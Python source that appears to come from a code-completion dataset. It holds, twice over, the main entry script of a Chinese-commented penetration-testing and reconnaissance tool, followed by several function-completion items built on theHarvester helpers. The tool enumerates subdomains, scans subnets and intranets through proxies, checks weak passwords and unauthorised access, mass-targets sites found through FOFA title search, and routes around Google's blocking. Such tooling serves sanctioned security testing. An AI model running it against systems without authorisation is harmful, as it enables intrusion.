parse.add_option('--domainFile', dest='domainFile', type='str', default=None, help='run domain title') # 跑多个域名
parse.add_option('--ksubdomain', dest='ksubdomain', type='int', default=1, help='not run ksubdomain') # 不使用ksubdomain跑子域名
parse.add_option('--test', dest='testDemo', type='int', default=0, help='if test=1 then run testDemo') # 测试某个功能
parse.add_option('--justInfoGather', dest='justInfoGather', type='int', default=0, help='just infoGather, not detect vul') # 只信息收集,不跑漏洞
parse.add_option('--getSocks', dest='getSocks', type='int', default=0, help='get socks') # 获取socks代理
options, args = parse.parse_args()
domain, cSubnet, isIntranet, proxy, File, weak, vpn, masNmapFile, fofaTitle, domainFile, web, ksubdomain, justInfoGather, testDemo, getSocks = options.domain, options.cSubnet, options.isIntranet, options.proxy, options.File, options.weak, options.vpn, options.masNmapFile, options.fofaTitle, options.domainFile, options.web, options.ksubdomain, options.justInfoGather, options.testDemo, options.getSocks
# 所有目标
allTargets_List = []
allTargets_Queue = Queue(-1)
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
# 代理
socksProxysDict = {"baidu": [], "google": []}
print(domain, cSubnet, isIntranet, proxy, File)
# requests代理
# 内网代理
if proxy:
requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
# 外网代理
else:
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
# 快代理配置
kuaidaili_tunnel = cf.get('kuaidaili', 'tunnel')
kuaidaili_username = cf.get('kuaidaili', 'username')
kuaidaili_password = cf.get('kuaidaili', 'password')
kuaidaili_thread_num = cf.get('kuaidaili', 'thread_num')
kuaidaili_switch = cf.get('kuaidaili', 'switch')
if kuaidaili_switch == "on":
requests_proxies = {
"http": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel},
"https": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel}
}
cprint('-' * 50 + 'Detect kuaidaili Config'.format(domain) + '-' * 50, 'green') # 验证代理是否有效
try:
kuaidaili_ips = []
for i in range(3):
res = requests.get(url='https://www.taobao.com/help/getip.php', proxies=requests_proxies, timeout=10, verify=False)
print(res.text)
ip = re.findall(r'ip:"([\d\.]+)"', res.text)[0]
print("此次请求IP: {}".format(ip))
kuaidaili_ips.append(ip)
if len(kuaidaili_ips) == 3:
cprint("快代理配置验证通过", 'red')
else:
cprint("快代理配置验证失败", 'red')
exit()
except Exception as OSError:
print("快代理配置错误或者快代理请求超时,请检查 {}".format(OSError.args))
exit()
else:
requests_proxies = None
# 分割C段,获取ip
if cSubnet:
CIP_List = cSubnet.split(',')
for CIP in CIP_List:
for ip in IP('{}/24'.format(CIP)):
allTargets_Queue.put(str(ip))
allTargets_List.append(str(ip))
# 扫描外网时加载文件扫描
if File and not isIntranet:
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 创建目录
# 扫描内网漏洞(Web或者服务)
if File and isIntranet:
if not web: # 扫描内网服务漏洞
save_fold_path, _excel_name = File.rsplit('/', 1)
excel_name = _excel_name.rsplit('.', 1)[0] + '_ServiceVul'
xlsxFileWB = openpyxl.load_workbook(File) # 打开文件
else: # 扫描内网web漏洞
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 扫描外网或者外网读取file.txt或者读取masNmap.xlsx时
else:
try:
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
except Exception:
pass
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
if domain and cSubnet:
cprint('Error: domain and cSubnet can only pass one', 'red')
exit(0)
elif domain and not cSubnet: # 跑域名
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_subdomain()
elif not domain and cSubnet: # 跑C段
if isIntranet == 0: # 外网C段
cprint('-' * 50 + 'Start {} cSubnet collection'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_cSubnet(CIP_List, {}, [], [])
elif isIntranet == 1:
if proxy or vpn: # 内网C段的扫描
cprint('-' * 50 + 'Start {} cSubnet intranet scan'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_intranet_cSubnet()
else:
cprint('Error: Please pass in the agent when scanning the intranet', 'red')
elif File:
if isIntranet and not web: # 扫描内网的服务漏洞
cprint('-' * 50 + 'Open {} Scanning for service vulnerabilities on the intranet'.format(File) + '-' * 50, 'green')
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('xlsxFile: {}'.format(File))
run_intranet_ServiceVul()
elif isIntranet and web: # 扫描内网Web漏洞
cprint('-' * 50 + 'Open {} Scanning for intranet Web vulnerabilities'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_intranetWeb()
else: # 扫描外网漏洞
cprint('-' * 50 + 'Open {} Scanning'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('open File: {}'.format(File))
run_file()
elif masNmapFile: # 跑masscan和nmap的结果
cprint('-' * 50 + 'Open masNmap File {} to Scanning'.format(masNmapFile) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_masNmap()
elif fofaTitle: # 跑fofa Title漏洞
cprint('-' * 50 + 'Run Fofa Search Title {} to Scanning'.format(fofaTitle) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_fofaTitle()
elif domainFile: # 跑域名文件
cprint('-' * 50 + 'Run Domain File {} to information collection'.format(domainFile) + '-' * 50, 'green')
with open(domainFile, 'rt') as f:
for each in f.readlines():
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
domain = each.strip()
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
run_subdomain()
elif testDemo == 1:
# 测试代码
# domain = ''
# save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
# os.makedirs(save_fold_path)
# excel_name = domain
# excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
#
# CIP_List = []
# Subdomains_ips = {}
# notCDNSubdomains = []
# param_Links = []
# run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
alive_Web = ['']
detect_webVul(alive_Web)
elif getSocks == 1:
# 从fofa收集代理
getSocksProxy()
if __name__ == '__main__':
_init()
def _init():
global domain, cSubnet, save_fold_path, excel, excel_name, excelSavePath, proxy, \
requests_proxies, isIntranet, xlsxFileWB, weak, CIP_List, allTargets_List, \
allTargets_Queue, masNmapFile, newDomains, ip_count, fofaTitle, ksubdomain, justInfoGather, socksProxysDict, kuaidaili_thread_num
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111 内网:使用代理扫描内网C段资产:web标题和漏洞
# proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx 内网:使用proxychains4代理扫描C段的服务漏洞:弱口令和未授权
# python3 %prog --mn masNmap.xlsx 外网:扫描masscan和nmap的结果
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1 内网:使用wifi或者vpn的情况下扫web标题和漏洞
banner()
checkVersion()
usage = '\n\t' \
'python3 %prog -d domain.com\n\t' \
'python3 %prog -d domain.com --justInfoGather 1\n\t' \
'python3 %prog -d domain.com --ksubdomain 0\n\t' \
'python3 %prog -c 192.168.1.0,192.168.2.0,192.168.3.0\n\t' \
'python3 %prog -f url.txt\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111\n\t' \
'python3 %prog -n 1 -f url.txt -p 1.1.1.1:1111 --web 1\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1\n\t' \
'proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'proxychains4 python3 %prog -n 1 -w 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx -w 1\n\t' \
'python3 %prog --fofaTitle 大学\n\t' \
'python3 %prog --domainFile domain.txt\n\t'
parse = OptionParser(usage=usage)
parse.add_option('-d', '--domain', dest='domain', type='string', help='target domain')
parse.add_option('-c', '--cSubnet', dest='cSubnet', type='string', help='target cSubnet')
# parse.add_option('--proxyFlag', dest='proxyFlag', type='int', default=0, help='0:No,1:kuaidaili,2:tencentcs') # 0不使用代理扫描,1使用快代理扫描,2使用腾讯云函数扫描
parse.add_option('-n', '--intranet', dest='isIntranet', type='int', default=0, help='Scan intranet value set to 1') # 扫描内网, 值为1扫内网, 默认为0
parse.add_option('-p', '--proxy', dest='proxy', type='string', default=None, help='Intranet proxy socks5 socks4') # 代理,socks5和socks4, 默认为None,可用于外网扫描,也可以用于内网扫描
parse.add_option('-f', '--file', dest='File', type='string', default=None, help='/result/2ddcaa3ebbd0/172.18.82.0.xlsx') # 扫描内网的服务漏洞-未授权和弱口令
parse.add_option('-w', '--weak', dest='weak', type='int', default=None, help='run weak password script') # 内网弱口令是否要跑
parse.add_option('-v', '--vpn', dest='vpn', type='int', default=None, help='Run in the case of vpn') # 在vpn的情况下跑
parse.add_option('--web', dest='web', type='int', default=None, help='detect web in Intranet') # 跑内网的web漏洞
parse.add_option('--mn', dest='masNmapFile', type='str', default=None, help='run masscan nmap result') # 跑masscan和nmap的结果
parse.add_option('--fofaTitle', dest='fofaTitle', type='str', default=None, help='run fofa title') # 跑fofa的title
parse.add_option('--domainFile', dest='domainFile', type='str', default=None, help='run domain title') # 跑多个域名
parse.add_option('--ksubdomain', dest='ksubdomain', type='int', default=1, help='not run ksubdomain') # 不使用ksubdomain跑子域名
parse.add_option('--test', dest='testDemo', type='int', default=0, help='if test=1 then run testDemo') # 测试某个功能
parse.add_option('--justInfoGather', dest='justInfoGather', type='int', default=0, help='just infoGather, not detect vul') # 只信息收集,不跑漏洞
parse.add_option('--getSocks', dest='getSocks', type='int', default=0, help='get socks') # 获取socks代理
options, args = parse.parse_args()
domain, cSubnet, isIntranet, proxy, File, weak, vpn, masNmapFile, fofaTitle, domainFile, web, ksubdomain, justInfoGather, testDemo, getSocks = options.domain, options.cSubnet, options.isIntranet, options.proxy, options.File, options.weak, options.vpn, options.masNmapFile, options.fofaTitle, options.domainFile, options.web, options.ksubdomain, options.justInfoGather, options.testDemo, options.getSocks
# 所有目标
allTargets_List = []
allTargets_Queue = Queue(-1)
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
# 代理
socksProxysDict = {"baidu": [], "google": []}
print(domain, cSubnet, isIntranet, proxy, File)
# requests代理
# 内网代理
if proxy:
requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
# 外网代理
else:
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
# 快代理配置
kuaidaili_tunnel = cf.get('kuaidaili', 'tunnel')
kuaidaili_username = cf.get('kuaidaili', 'username')
kuaidaili_password = cf.get('kuaidaili', 'password')
kuaidaili_thread_num = cf.get('kuaidaili', 'thread_num')
kuaidaili_switch = cf.get('kuaidaili', 'switch')
if kuaidaili_switch == "on":
requests_proxies = {
"http": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel},
"https": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel}
}
cprint('-' * 50 + 'Detect kuaidaili Config'.format(domain) + '-' * 50, 'green') # 验证代理是否有效
try:
kuaidaili_ips = []
for i in range(3):
res = requests.get(url='https://www.taobao.com/help/getip.php', proxies=requests_proxies, timeout=10, verify=False)
print(res.text)
ip = re.findall(r'ip:"([\d\.]+)"', res.text)[0]
print("此次请求IP: {}".format(ip))
kuaidaili_ips.append(ip)
if len(kuaidaili_ips) == 3:
cprint("快代理配置验证通过", 'red')
else:
cprint("快代理配置验证失败", 'red')
exit()
except Exception as OSError:
print("快代理配置错误或者快代理请求超时,请检查 {}".format(OSError.args))
exit()
else:
requests_proxies = None
# 分割C段,获取ip
if cSubnet:
CIP_List = cSubnet.split(',')
for CIP in CIP_List:
for ip in IP('{}/24'.format(CIP)):
allTargets_Queue.put(str(ip))
allTargets_List.append(str(ip))
# 扫描外网时加载文件扫描
if File and not isIntranet:
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 创建目录
# 扫描内网漏洞(Web或者服务)
if File and isIntranet:
if not web: # 扫描内网服务漏洞
save_fold_path, _excel_name = File.rsplit('/', 1)
excel_name = _excel_name.rsplit('.', 1)[0] + '_ServiceVul'
xlsxFileWB = openpyxl.load_workbook(File) # 打开文件
else: # 扫描内网web漏洞
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 扫描外网或者外网读取file.txt或者读取masNmap.xlsx时
else:
try:
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
except Exception:
pass
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
if domain and cSubnet:
cprint('Error: domain and cSubnet can only pass one', 'red')
exit(0)
elif domain and not cSubnet: # 跑域名
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_subdomain()
elif not domain and cSubnet: # 跑C段
if isIntranet == 0: # 外网C段
cprint('-' * 50 + 'Start {} cSubnet collection'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_cSubnet(CIP_List, {}, [], [])
elif isIntranet == 1:
if proxy or vpn: # 内网C段的扫描
cprint('-' * 50 + 'Start {} cSubnet intranet scan'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_intranet_cSubnet()
else:
cprint('Error: Please pass in the agent when scanning the intranet', 'red')
elif File:
if isIntranet and not web: # 扫描内网的服务漏洞
cprint('-' * 50 + 'Open {} Scanning for service vulnerabilities on the intranet'.format(File) + '-' * 50, 'green')
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('xlsxFile: {}'.format(File))
run_intranet_ServiceVul()
elif isIntranet and web: # 扫描内网Web漏洞
cprint('-' * 50 + 'Open {} Scanning for intranet Web vulnerabilities'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_intranetWeb()
else: # 扫描外网漏洞
cprint('-' * 50 + 'Open {} Scanning'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('open File: {}'.format(File))
run_file()
elif masNmapFile: # 跑masscan和nmap的结果
cprint('-' * 50 + 'Open masNmap File {} to Scanning'.format(masNmapFile) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_masNmap()
elif fofaTitle: # 跑fofa Title漏洞
cprint('-' * 50 + 'Run Fofa Search Title {} to Scanning'.format(fofaTitle) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_fofaTitle()
elif domainFile: # 跑域名文件
cprint('-' * 50 + 'Run Domain File {} to information collection'.format(domainFile) + '-' * 50, 'green')
with open(domainFile, 'rt') as f:
for each in f.readlines():
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
domain = each.strip()
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
run_subdomain()
elif testDemo == 1:
# 测试代码
# domain = ''
# save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
# os.makedirs(save_fold_path)
# excel_name = domain
# excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
#
# CIP_List = []
# Subdomains_ips = {}
# notCDNSubdomains = []
# param_Links = []
# run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
alive_Web = ['']
detect_webVul(alive_Web)
elif getSocks == 1:
# 从fofa收集代理
getSocksProxy() | null |
189,268 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
NETWORK_REGEX = r'\b({})(?:\:({}))?(?:\/({}))?\b'.format(
IP_REGEX,
PORT_REGEX,
NETMASK_REGEX)
The provided code snippet includes necessary dependencies for implementing the `serialize_ip_range` function. Write a Python function `def serialize_ip_range( ip: str, netmask: str = '24') -> str` to solve the following problem:
Serialize a network range in a constant format, 'x.x.x.x/y'. Parameters ---------- ip: str. A serialized ip in the format 'x.x.x.x'. Extra information like port (':z') or subnet ('/n') will be ignored. netmask: str. The subnet subdivision, represented by a 2 digit netmask. Returns ------- out: str. The network OSI address, like '192.168.0.0/24'.
Here is the function:
def serialize_ip_range(
ip: str,
netmask: str = '24') -> str:
"""
Serialize a network range in a constant format, 'x.x.x.x/y'.
Parameters
----------
ip: str.
A serialized ip in the format 'x.x.x.x'.
Extra information like port (':z') or subnet ('/n')
will be ignored.
netmask: str.
The subnet subdivision, represented by a 2 digit netmask.
Returns
-------
out: str.
The network OSI address, like '192.168.0.0/24'.
"""
__ip_matches = re.search(NETWORK_REGEX, ip, re.IGNORECASE)
if __ip_matches and __ip_matches.groups():
__ip = __ip_matches.group(1)
__netmask = netmask if netmask else __ip_matches.group(3)
if __ip and __netmask:
return str(IPv4Network('{}/{}'.format(__ip, __netmask), strict=False))
elif __ip:
return str(IPv4Network('{}/{}'.format(__ip, '24'), strict=False))
# invalid input ip
return '' | Serialize a network range in a constant format, 'x.x.x.x/y'. Parameters ---------- ip: str. A serialized ip in the format 'x.x.x.x'. Extra information like port (':z') or subnet ('/n') will be ignored. netmask: str. The subnet subdivision, represented by a 2 digit netmask. Returns ------- out: str. The network OSI address, like '192.168.0.0/24'. |
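A minimal usage sketch for serialize_ip_range (the IPs below are illustrative, and the IP_REGEX/PORT_REGEX/NETMASK_REGEX constants are assumed to be defined as in the full module):
print(serialize_ip_range('192.168.0.37'))          # '192.168.0.0/24' with the default /24 netmask
print(serialize_ip_range('10.1.2.3:8080', '16'))   # port is ignored, yields '10.1.0.0/16'
print(serialize_ip_range('not an ip'))             # '' for input that does not match the regex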
189,269 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
def list_ips_in_network_range(iprange: str) -> List[str]:
"""
List all the IPs in the range.
Parameters
----------
iprange: str.
A serialized ip range, like '1.2.3.0/24'.
The last digit can be set to anything, it will be ignored.
Returns
-------
out: list.
The list of IPs in the range.
"""
try:
__network = IPv4Network(iprange, strict=False)
return [__address.exploded for __address in __network.hosts()]
except Exception:
return []
async def reverse_single_ip(ip: str, resolver: DNSResolver) -> str:
"""
Reverse a single IP and output the linked CNAME, if it exists.
Parameters
----------
:param ip: IP address to reverse
:param resolver: DNS server to use
Returns
-------
:return str: with the corresponding CNAME or None
"""
try:
__host = await resolver.gethostbyaddr(ip)
return __host.name if __host else ''
except Exception:
return ''
def log_query(ip: str) -> None:
"""
Display the current query in the console.
Parameters
----------
ip: str.
Queried ip.
Results
-------
out: None.
"""
sys.stdout.write(chr(27) + '[2K' + chr(27) + '[G')
sys.stdout.write('\r' + ip + ' - ')
sys.stdout.flush()
def log_result(host: str) -> None:
"""
Display the query result in the console.
Parameters
----------
host: str.
Host name returned by the DNS query.
Results
-------
out: None.
"""
if host:
print(host)
The provided code snippet includes necessary dependencies for implementing the `reverse_all_ips_in_range` function. Write a Python function `async def reverse_all_ips_in_range(iprange: str, callback: Callable, nameservers: Optional[List[str]] = None) -> None` to solve the following problem:
Reverse all the IPs stored in a network range. All the queries are made concurrently. Parameters ---------- iprange: str. An IPv4 range formatted as 'x.x.x.x/y'. The last 2 digits of the ip can be set to anything, they will be ignored. callback: Callable. Arbitrary postprocessing function. nameservers: List[str]. Optional list of DNS servers. Returns ------- out: None.
Here is the function:
async def reverse_all_ips_in_range(iprange: str, callback: Callable, nameservers: Optional[List[str]] = None) -> None:
"""
Reverse all the IPs stored in a network range.
All the queries are made concurrently.
Parameters
----------
iprange: str.
An IPv4 range formatted as 'x.x.x.x/y'.
The last 2 digits of the ip can be set to anything,
they will be ignored.
callback: Callable.
Arbitrary postprocessing function.
nameservers: List[str].
Optional list of DNS servers.
Returns
-------
out: None.
"""
__resolver = DNSResolver(timeout=4, nameservers=nameservers)
for __ip in list_ips_in_network_range(iprange):
log_query(__ip)
__host = await reverse_single_ip(ip=__ip, resolver=__resolver)
callback(__host)
log_result(__host) | Reverse all the IPs stored in a network range. All the queries are made concurrently. Parameters ---------- iprange: str. An IPv4 range formated as 'x.x.x.x/y'. The last 2 digits of the ip can be set to anything, they will be ignored. callback: Callable. Arbitrary postprocessing function. nameservers: List[str]. Optional list of DNS servers. Returns ------- out: None. |
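A minimal driver sketch for the coroutine above (the range, resolver and callback are illustrative, not taken from the dataset):
import asyncio

found = []

def collect(host):
    # keep any non-empty PTR answers
    if host:
        found.append(host)

# example TEST-NET range, any /24 can be substituted
asyncio.run(reverse_all_ips_in_range('192.0.2.0/24', collect, nameservers=['8.8.8.8']))
print(found)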
189,270 | import re
import sys
from aiodns import DNSResolver
from ipaddress import IPv4Network
from typing import Callable, List, Optional
from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib import hostchecker
The provided code snippet includes necessary dependencies for implementing the `generate_postprocessing_callback` function. Write a Python function `def generate_postprocessing_callback(target: str, **allhosts: List[str]) -> Callable` to solve the following problem:
Postprocess the query results asynchronously too, instead of waiting for the querying stage to be completely finished. Parameters ---------- target: str. The domain wanted as TLD. allhosts: List. A collection of all the subdomains -of target- found so far. Returns ------- out: Callable. A function that will update the collection of target subdomains when the query result is satisfying.
Here is the function:
def generate_postprocessing_callback(target: str, **allhosts: List[str]) -> Callable:
"""
Postprocess the query results asynchronously too, instead of waiting for
the querying stage to be completely finished.
Parameters
----------
target: str.
The domain wanted as TLD.
allhosts: List.
A collection of all the subdomains -of target- found so far.
Returns
-------
out: Callable.
A function that will update the collection of target subdomains
when the query result is satisfying.
"""
def append_matching_hosts(host: str) -> None:
if host and target in host:
for __name, __hosts in allhosts.items():
if host not in __hosts:
__hosts.append(host)
return append_matching_hosts | Postprocess the query results asynchronously too, instead of waiting for the querying stage to be completely finished. Parameters ---------- target: str. The domain wanted as TLD. allhosts: List. A collection of all the subdomains -of target- found so far. Returns ------- out: Callable. A function that will update the collection of target subdomains when the query result is satisfying. |
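A small sketch of how the returned callback behaves (the domain and hosts are illustrative):
subdomains = []
callback = generate_postprocessing_callback('example.com', subdomains=subdomains)
callback('mail.example.com')   # contains the target, gets stored
callback('unrelated.org')      # does not contain the target, ignored
print(subdomains)              # ['mail.example.com']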
189,271 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `splitter` function. Write a Python function `async def splitter(links)` to solve the following problem:
Method that tries to remove duplicates LinkedinLists pulls a lot of profiles with the same name. This method tries to remove duplicates from the list. :param links: list of links to remove duplicates from :return: unique-ish list
Here is the function:
async def splitter(links):
"""
Method that tries to remove duplicates
LinkedinLists pulls a lot of profiles with the same name.
This method tries to remove duplicates from the list.
:param links: list of links to remove duplicates from
:return: unique-ish list
"""
unique_list = []
name_check = []
for url in links:
tail = url.split("/")[-1]
if len(tail) == 2 or tail == "zh-cn":
tail = url.split("/")[-2]
name = tail.split("-")
if len(name) > 1:
joined_name = name[0] + name[1]
else:
joined_name = name[0]
if joined_name not in name_check:
unique_list.append(url)
name_check.append(joined_name)
return unique_list | Method that tries to remove duplicates LinkedinLists pulls a lot of profiles with the same name. This method tries to remove duplicates from the list. :param links: list of links to remove duplicates from :return: unique-ish list |
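A quick sketch of the de-duplication behaviour (the LinkedIn URLs are made up):
import asyncio

links = [
    'https://www.linkedin.com/in/jane-doe-123',
    'https://www.linkedin.com/in/jane-doe-456',   # same person, different profile id
    'https://www.linkedin.com/in/john-smith',
]
print(asyncio.run(splitter(links)))   # keeps one jane-doe entry plus john-smith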
189,272 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `filter` function. Write a Python function `def filter(lst)` to solve the following problem:
Method that filters list :param lst: list to be filtered :return: new filtered list
Here is the function:
def filter(lst):
"""
Method that filters list
:param lst: list to be filtered
:return: new filtered list
"""
if lst is None:
return []
if not isinstance(lst, set):
lst = set(lst) # Remove duplicates.
new_lst = []
for item in lst:
item = str(item)
if (item[0].isalpha() or item[0].isdigit()) and ('xxx' not in item) and ('..' not in item):
item = item.replace('252f', '').replace('2F', '').replace('2f', '')
new_lst.append(item.lower())
return new_lst | Method that filters list :param lst: list to be filtered :return: new filtered list |
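A short sketch of the filtering behaviour (note that this helper shadows the built-in filter; the hostnames are illustrative):
hosts = ['mail.example.com', 'mail.example.com', '..broken', 'xxxdemo.example.com', '252fadmin.example.com']
print(filter(hosts))
# exact duplicates collapsed, entries containing 'xxx' or '..' dropped, '252f' URL-encoding noise stripped, everything lowercased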
189,273 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
The provided code snippet includes necessary dependencies for implementing the `get_delay` function. Write a Python function `def get_delay() -> float` to solve the following problem:
Method that is used to generate a random delay
Here is the function:
def get_delay() -> float:
"""Method that is used to generate a random delay"""
return random.randint(1, 3) - .5 | Method that is used to generate a random delay |
189,274 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
from typing import Union
import random
async def search(text: str) -> bool:
"""Helper function to check if Google has blocked traffic.
:param text: See if certain text is returned which means Google is blocking us
:return bool:
"""
for line in text.strip().splitlines():
if 'This page appears when Google automatically detects requests coming from your computer network' in line \
or 'http://www.google.com/sorry/index' in line or 'https://www.google.com/sorry/index' in line:
# print('\tGoogle is blocking your IP due to too many automated requests, wait or change your IP')
return True
return False
The provided code snippet includes necessary dependencies for implementing the `google_workaround` function. Write a Python function `async def google_workaround(visit_url: str) -> Union[bool, str]` to solve the following problem:
Function that makes a request on our behalf, if Google starts to block us :param visit_url: Url to scrape :return: Correct html that can be parsed by BS4
Here is the function:
async def google_workaround(visit_url: str) -> Union[bool, str]:
"""
Function that makes a request on our behalf, if Google starts to block us
:param visit_url: Url to scrape
:return: Correct html that can be parsed by BS4
"""
url = 'https://websniffer.cc/'
data = {
'Cookie': '',
'url': visit_url,
'submit': 'Submit',
'type': 'GET&http=1.1',
'uak': str(random.randint(4, 8)) # select random UA to send to Google
}
returned_html = await AsyncFetcher.post_fetch(url, headers={'User-Agent': Core.get_user_agent()}, data=data)
returned_html = "This page appears when Google automatically detects requests coming from your computer network" \
if returned_html == "" else returned_html[0]
if await search(returned_html):
# indicates that google is serving workaround a captcha
# That means we will try out second option which will utilize proxies
return True
# the html we get is malformed for BS4 as there are no greater than or less than signs
if '&lt;html&gt;' in returned_html:
start_index = returned_html.index('&lt;html&gt;')
else:
start_index = returned_html.index('&lt;html')
end_index = returned_html.index('&lt;/html&gt;') + 1
correct_html = returned_html[start_index:end_index]
# Slice list to get the response's html
correct_html = ''.join([ch.strip().replace('&lt;', '<').replace('&gt;', '>') for ch in correct_html])
return correct_html | Function that makes a request on our behalf, if Google starts to block us :param visit_url: Url to scrape :return: Correct html that can be parsed by BS4 |
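A usage sketch, assuming the AsyncFetcher/Core helpers imported above are available; the search URL is illustrative:
import asyncio

async def demo():
    html = await google_workaround('https://www.google.com/search?q=site:example.com')
    if html is True:
        print('websniffer.cc is also being blocked, fall back to proxies')
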